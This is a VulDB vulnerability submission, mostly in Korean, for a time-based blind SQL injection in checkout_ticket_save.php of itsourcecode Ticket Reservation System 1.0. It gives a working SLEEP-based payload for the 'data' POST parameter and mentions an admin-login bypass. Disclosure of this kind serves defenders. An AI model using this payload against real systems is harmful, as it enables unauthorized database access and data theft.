제출 #383644: itsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.php정보

제목itsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.php
설명By exploiting a universal password vulnerability to log into the admin backend, an SQL injection vulnerability occurs on the "checkout_ticket_save.php" page due to the lack of strict filtering of the data parameter. --------------POC-------------- Parameter: data (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: data=123' AND (SELECT 7295 FROM (SELECT(SLEEP(5)))zbyg) AND 'JWwh'='JWwh
원천⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-2.md
사용자
 Dee.Mirage (UID 71702)
제출2024. 07. 31. AM 07:22 (2 연령 ago)
모더레이션2024. 08. 02. PM 11:43 (3 days later)
상태수락
VulDB 항목273530 [itsourcecode Ticket Reservation System 1.0 checkout_ticket_save.php data SQL 주입]
포인트들20

이전개요다음

Interested in the pricing of exploits?

See the underground prices here!